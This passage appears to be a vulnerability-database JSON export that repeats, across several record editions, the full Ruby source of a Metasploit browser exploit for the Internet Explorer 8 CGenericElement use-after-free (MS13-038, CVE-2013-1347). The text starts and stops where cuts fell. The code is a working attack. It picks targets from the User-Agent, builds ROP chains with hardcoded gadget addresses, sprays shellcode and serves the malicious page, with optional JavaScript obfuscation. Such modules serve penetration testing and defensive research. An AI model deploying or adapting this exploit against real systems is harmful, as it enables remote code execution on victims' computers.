{"score": {"value": 9.0, "modified": "2018-02-25T20:58:06"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-25T20:58:06", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-08T09:01:05", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-08T09:01:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-08T09:01:05", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-08T10:55:15", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-08T10:55:15"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-08T10:55:15", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-10T00:59:34", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-10T00:59:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n 